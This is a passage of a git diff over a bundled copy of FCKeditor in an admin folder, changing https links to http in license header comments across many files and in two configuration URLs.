http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/zh-cn.js b/admin/FCKeditor/editor/lang/zh-cn.js index 574ed55..00fe41e 100755 --- a/admin/FCKeditor/editor/lang/zh-cn.js +++ b/admin/FCKeditor/editor/lang/zh-cn.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/zh.js b/admin/FCKeditor/editor/lang/zh.js index ad3877a..7fed779 100755 --- a/admin/FCKeditor/editor/lang/zh.js +++ b/admin/FCKeditor/editor/lang/zh.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/autogrow/fckplugin.js b/admin/FCKeditor/editor/plugins/autogrow/fckplugin.js index 36387f3..c75992c 100755 --- a/admin/FCKeditor/editor/plugins/autogrow/fckplugin.js +++ b/admin/FCKeditor/editor/plugins/autogrow/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/fck_placeholder.html b/admin/FCKeditor/editor/plugins/placeholder/fck_placeholder.html index d356a7e..553bf52 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/fck_placeholder.html +++ b/admin/FCKeditor/editor/plugins/placeholder/fck_placeholder.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/fckplugin.js b/admin/FCKeditor/editor/plugins/placeholder/fckplugin.js index e6ba608..73dbb7a 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/fckplugin.js +++ b/admin/FCKeditor/editor/plugins/placeholder/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/lang/de.js b/admin/FCKeditor/editor/plugins/placeholder/lang/de.js index 73619eb..38dbe02 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/lang/de.js +++ b/admin/FCKeditor/editor/plugins/placeholder/lang/de.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/lang/en.js b/admin/FCKeditor/editor/plugins/placeholder/lang/en.js index 304ce69..ebe585e 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/lang/en.js +++ b/admin/FCKeditor/editor/plugins/placeholder/lang/en.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/lang/fr.js b/admin/FCKeditor/editor/plugins/placeholder/lang/fr.js index e3beca9..c41cbb6 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/lang/fr.js +++ b/admin/FCKeditor/editor/plugins/placeholder/lang/fr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/lang/it.js b/admin/FCKeditor/editor/plugins/placeholder/lang/it.js index 786515d..6501854 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/lang/it.js +++ b/admin/FCKeditor/editor/plugins/placeholder/lang/it.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/placeholder/lang/pl.js b/admin/FCKeditor/editor/plugins/placeholder/lang/pl.js index 0ac4dfe..4105d17 100755 --- a/admin/FCKeditor/editor/plugins/placeholder/lang/pl.js +++ b/admin/FCKeditor/editor/plugins/placeholder/lang/pl.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/simplecommands/fckplugin.js b/admin/FCKeditor/editor/plugins/simplecommands/fckplugin.js index ef9d7c9..94a9a7b 100755 --- a/admin/FCKeditor/editor/plugins/simplecommands/fckplugin.js +++ b/admin/FCKeditor/editor/plugins/simplecommands/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/plugins/tablecommands/fckplugin.js b/admin/FCKeditor/editor/plugins/tablecommands/fckplugin.js index 88cff98..b7a5335 100755 --- a/admin/FCKeditor/editor/plugins/tablecommands/fckplugin.js +++ b/admin/FCKeditor/editor/plugins/tablecommands/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/_fckviewstrips.html b/admin/FCKeditor/editor/skins/_fckviewstrips.html index 3c6d097..99d64d7 100755 --- a/admin/FCKeditor/editor/skins/_fckviewstrips.html +++ b/admin/FCKeditor/editor/skins/_fckviewstrips.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Useful page that enumerates all icons in the skins strips. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - View Icons Strips</title> <style type="text/css"> diff --git a/admin/FCKeditor/editor/skins/default/fck_dialog.css b/admin/FCKeditor/editor/skins/default/fck_dialog.css index ca10a11..2b8bd87 100755 --- a/admin/FCKeditor/editor/skins/default/fck_dialog.css +++ b/admin/FCKeditor/editor/skins/default/fck_dialog.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/default/fck_editor.css b/admin/FCKeditor/editor/skins/default/fck_editor.css index 95287e8..31f9742 100755 --- a/admin/FCKeditor/editor/skins/default/fck_editor.css +++ b/admin/FCKeditor/editor/skins/default/fck_editor.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/office2003/fck_dialog.css b/admin/FCKeditor/editor/skins/office2003/fck_dialog.css index 5f61b74..e37f427 100755 --- a/admin/FCKeditor/editor/skins/office2003/fck_dialog.css +++ b/admin/FCKeditor/editor/skins/office2003/fck_dialog.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/office2003/fck_editor.css b/admin/FCKeditor/editor/skins/office2003/fck_editor.css index 4af9611..5c3029f 100755 --- a/admin/FCKeditor/editor/skins/office2003/fck_editor.css +++ b/admin/FCKeditor/editor/skins/office2003/fck_editor.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/silver/fck_dialog.css b/admin/FCKeditor/editor/skins/silver/fck_dialog.css index a16fddb..896db53 100755 --- a/admin/FCKeditor/editor/skins/silver/fck_dialog.css +++ b/admin/FCKeditor/editor/skins/silver/fck_dialog.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/skins/silver/fck_editor.css b/admin/FCKeditor/editor/skins/silver/fck_editor.css index 030636f..ad52648 100755 --- a/admin/FCKeditor/editor/skins/silver/fck_editor.css +++ b/admin/FCKeditor/editor/skins/silver/fck_editor.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckconfig.js b/admin/FCKeditor/fckconfig.js index 769dc19..7f89d0b 100755 --- a/admin/FCKeditor/fckconfig.js +++ b/admin/FCKeditor/fckconfig.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,20 +8,20 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Editor configuration settings. * * Follow this link for more information: - * https://wiki.fckeditor.net/Developer%27s_Guide/Configuration/Configurations_Settings + * http://wiki.fckeditor.net/Developer%27s_Guide/Configuration/Configurations_Settings */ // Disable the custom Enter Key Handler. This option will be removed in version 2.5. @@ -170,7 +170,7 @@ FCKConfig.StylesXmlPath = FCKConfig.EditorPath + 'fckstyles.xml' ; FCKConfig.TemplatesXmlPath = FCKConfig.EditorPath + 'fcktemplates.xml' ; FCKConfig.SpellChecker = 'ieSpell' ; // 'ieSpell' | 'SpellerPages' -FCKConfig.IeSpellDownloadUrl = 'https://www.iespell.com/download.php' ; +FCKConfig.IeSpellDownloadUrl = 'http://www.iespell.com/download.php' ; FCKConfig.SpellerPagesServerScript = 'server-scripts/spellchecker.php' ; // Available extension: .php .cfm .pl FCKConfig.FirefoxSpellChecker = false ; diff --git a/admin/FCKeditor/fckeditor.afp b/admin/FCKeditor/fckeditor.afp index 885bf07..67ffa09 100755 --- a/admin/FCKeditor/fckeditor.afp +++ b/admin/FCKeditor/fckeditor.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.asp b/admin/FCKeditor/fckeditor.asp index 1edb577..1f65cb5 100755 --- a/admin/FCKeditor/fckeditor.asp +++ b/admin/FCKeditor/fckeditor.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.cfc b/admin/FCKeditor/fckeditor.cfc index 4fe50f0..923f0b0 100755 --- a/admin/FCKeditor/fckeditor.cfc +++ b/admin/FCKeditor/fckeditor.cfc @@ -1,6 +1,6 @@ <cfcomponent output="false" displayname="FCKeditor" hint="Create an instance of the FCKeditor."> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.cfm b/admin/FCKeditor/fckeditor.cfm index 7ec62f7..6268462 100755 --- a/admin/FCKeditor/fckeditor.cfm +++ b/admin/FCKeditor/fckeditor.cfm @@ -1,6 +1,6 @@ <cfsetting enablecfoutputonly="Yes"> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.js b/admin/FCKeditor/fckeditor.js index 6af8e24..8bcb16c 100755 --- a/admin/FCKeditor/fckeditor.js +++ b/admin/FCKeditor/fckeditor.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.lasso b/admin/FCKeditor/fckeditor.lasso index 3fcac15..3c24043 100755 --- a/admin/FCKeditor/fckeditor.lasso +++ b/admin/FCKeditor/fckeditor.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.php b/admin/FCKeditor/fckeditor.php index bbd40af..3b9e617 100755 --- a/admin/FCKeditor/fckeditor.php +++ b/admin/FCKeditor/fckeditor.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/fckeditor.pl b/admin/FCKeditor/fckeditor.pl index e8bca70..de87c14 100755 --- a/admin/FCKeditor/fckeditor.pl +++ b/admin/FCKeditor/fckeditor.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/fckeditor.py b/admin/FCKeditor/fckeditor.py index fa9d424..c92345b 100755 --- a/admin/FCKeditor/fckeditor.py +++ b/admin/FCKeditor/fckeditor.py @@ -1,5 +1,5 @@ """ -FCKeditor - The text editor for Internet - https://www.fckeditor.net +FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2007 Frederico Caldeira Knabben == BEGIN LICENSE == @@ -8,13 +8,13 @@ Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") - 